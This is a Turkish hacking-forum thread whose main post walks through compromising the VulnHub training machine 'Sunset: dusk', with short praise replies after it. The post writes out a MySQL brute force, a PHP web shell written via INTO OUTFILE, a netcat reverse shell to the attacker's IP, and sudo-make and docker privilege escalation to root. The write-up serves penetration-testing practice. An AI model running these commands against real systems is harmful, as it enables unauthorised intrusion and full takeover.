Sunset:Dusk Zafiyetli Makinesinin Çözümü//"P4RS

P4RS

Özel Üye

Üyelik tarihi:

01/2017

Nereden:

Ankara

Mesajlar:

5.139

Konular:

626

Teşekkür (Etti):

1779

Teşekkür (Aldı):

3708

Ticaret:

(0) %

1759

24-12-2019 11:42

Merhabalar TürkHackTeam ailesi, bugün sizlere Sunset:dusk VulnHub Zafiyetli Makinesinin Çözümünü göstereceğim.

https://www.vulnhub.com/entry/sunset-dusk,404/

Makine İsmi: Sunset: dusk

Yayınlanma Tarihi: 1 Aralık 2019

Yapımcı: whitecr0wz

Seri: sunset

Açıklama: Hedefde ki user.txt ve root.txt dosyalarında ki flag'ı almak

Dosya Boyutu: 1.1 GB

İşletim Sistemi: Linux

Zorluk Derecesi: Kolay

İlk olarak makinenin IP adresini öğrenmek için

Kod:

sudo netdiscover

yazalım.

Makinenin IP adresini öğrendik.

Şimdi açık portları öğrenmek ve yolumuzu çizmek için NMAP taraması yapacağız. Terminale

Kod:

nmap -A IP_adresi

yazalım.

Burada önemli nokta mysql'in açık olması

80 portu açıktı ve bir site olduğunu anladık, siteye girdiğimiz de sitede pekte bir şey bulamadık.

Ardından Hydra aracı ile MySQL'e Brute saldırı yapacağız. Bunun için

Kod:

hydra -L kullanıcı_adı_listesi -P şifre_listesi IP_adresi mysql

yazalım. Gördüğünüz gibi bilgiyi aldık kullanıcı adı: root şifre: password

Ardından sitenin 8080 portuna gittim ve /var/tmp olduğumuzu söylüyor bize. MySQL'i kullanarak buraya veri atacağız birazdan.

MySQL'e giriş yapmak için

Kod:

mysql -h IP_adresi -u root -p

yazalım ve şifreyi girelim. Ardından https://github.com/pentestmonkey/php...erse-shell.php buraya giderek kodları kopyalayıp bir php dosyası oluşturalım. Bu kodlarda biraz aşağıda CHANGE THİS kısımları var.

Kod:

$VERSION = "1.0";
$ip = '127.0.0.1';  // CHANGE THIS
$port = 1234;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

burada $ip = kendi makineninizin IP adresinizi yazınız.
Ardından MySQL'e

Kod:

select "<?php system($_GET['cmd']); ?>" into outfile '/var/tmp/p4rs.php' ;

p4rs.php dosyasını ben kendim oluşturdum siz başka isimde de oluşturabilirsiniz.

Tarayıcıya IP_adresi:8080 yazdığımızda kendi oluşturduğumuz dosyamız içeride gördüğünüz gibi.

Tarayıcıya gelerek

Kod:

http://IP_adresi:8080/p4rs.php?cmd=id

yazdığımızda RCE komutu gördüğünüz gibi sistemde çalıştı.

Şimdi terminali açalım ve portu dinlemeye alalım

Kod:

nc -lvp 1234

. Ardından tarayıcıya da

Kod:

http://IP_adresi:8080/p4rs.php?cmd=nc -e /bin/bash Kendi_IP_adresiniz 1234

yazalım ve içeri girelim.

Bağlantı kuruldu ve içeri girdik, kabuk yükseltmesi için

Kod:

python -c "import pty;pty.spawn('/bin/bash')"

yazalım. Ardından home dizinine girip dusk dizinine girelim. Gördüğünüz gibi orada user.txt dosyasını bulduk yazdıralım ve ilk bayrağı alalım.

Sudo haklarını öğrenmek için sudo -l yazdık. Şimdi exploit ederek içeri girmek için

Kod:

COMMAND='/bin/sh'
sudo -u dusk make -s --eval=$'x:\n\t-'"$COMMAND"

yazdık. groups yazdığımızda docker grubunda olduğunu öğrendik.

Docker'ı kullanarak yapacağız ancak fotoğrafta gözükmemiş orada. -v parametresi istediğimiz bir şeyi oluşturmak için -i ve -t kabuk moduna girmek için kullanılır.

Kod:

docker run -v /:/hostOS -i -t chrisfosterelli/rootplease

yazdık ve birkaç veri oluşturdu, içeri girdik.
id dediğimiz de root yetkisinde olduğumuzu gördük. Direk

Kod:

cd /root

yazdık ve root dizinine girdik.

Kod:

ls

yazdığımızda root.txt dosyası olduğunu gördük ve yazdırdık.

Gördüğünüz gibi iki bayrağı da aldık

Konum bu kadardı arkadaşlar, başka bir konumda görüşmek üzere sağlıcakla...

---------------------

https://i.hizliresim.com/7t0kzc.gif

Twitter

[email protected]

𝖘𝖊𝖞𝖈𝖎𝖑𝖊𝖗

Alıntı Yap

Xowly, x4807, Ranger_THT, CiHaN-i TuRaN, NOVA, Crysisden, ĸaraтay creaтιve, ZoRRoKiN, RTFM, AhmetKaan46 Teşekkür etti.

Xowly

Researcher

Üyelik tarihi:

06/2019

Nereden:

ғate

Mesajlar:

725

Konular:

Ticaret:

(0) %

24-12-2019 16:55

Ellerine sağlık yeni düzeni sevdim, devamını bekliyorum

Alıntı Yap

x4807

Analizci

Üyelik tarihi:

08/2019

Nereden:

\x20

Mesajlar:

955

Konular:

111

Ticaret:

(0) %

24-12-2019 17:04

Ellerinize sağlık hocam böyle zaafiyetli makine çözüm konuları hoş oluyor

Alıntı Yap

NOVA

Kıdemli Grafiker

Üyelik tarihi:

06/2016

Nereden:

Yaş:

Mesajlar:

2.478

Konular:

397

Teşekkür (Etti):

1431

Teşekkür (Aldı):

2212

Ticaret:

(0) %

24-12-2019 19:01

Elinize Sağlık. Güzel konu.

---------------------

⁌ ƝOVA ⁍
-
instagram - telegram - twitter - youtube
-
Grafik Tasarım Bölüm Kuralları

Alıntı Yap

P4RS

Özel Üye

Üyelik tarihi:

01/2017

Nereden:

Ankara

Mesajlar:

5.139

Konular:

626

Teşekkür (Etti):

1779

Teşekkür (Aldı):

3708

Ticaret:

(0) %

24-12-2019 22:15

Alıntı:

Xowly´isimli üyeden Alıntı

Ellerine sağlık yeni düzeni sevdim, devamını bekliyorum

Alıntı:

Noah Parker´isimli üyeden Alıntı

Ellerinize sağlık hocam böyle zaafiyetli makine çözüm konuları hoş oluyor

Alıntı:

dcrean´isimli üyeden Alıntı

Elinize Sağlık. Güzel konu.

Beğenmenize sevindim arkadaşlar

---------------------

https://i.hizliresim.com/7t0kzc.gif

Twitter

[email protected]

𝖘𝖊𝖞𝖈𝖎𝖑𝖊𝖗

Alıntı Yap

ZoRRoKiN

Administrator

Üyelik tarihi:

08/2005

Nereden:

WORLD

Mesajlar:

2.114

Konular:

796

Teşekkür (Etti):

455

Teşekkür (Aldı):

6733

Ticaret:

(1) %

25-12-2019 10:14

Güzel paylaşım.

--------------------- Ne fark eder ki...

Alıntı Yap

P4RS Teşekkür etti.

P4RS

Özel Üye

Üyelik tarihi:

01/2017

Nereden:

Ankara

Mesajlar:

5.139

Konular:

626

Teşekkür (Etti):

1779

Teşekkür (Aldı):

3708

Ticaret:

(0) %

25-12-2019 19:20

Alıntı:

ZoRRoKiN´isimli üyeden Alıntı

Güzel paylaşım.

Beğenmenize çok sevindim hocam

---------------------

https://i.hizliresim.com/7t0kzc.gif

Twitter

[email protected]

𝖘𝖊𝖞𝖈𝖎𝖑𝖊𝖗

Alıntı Yap

Seçenekler
Yazdırılabilir şekli göster Sayfayı E-Mail olarak gönder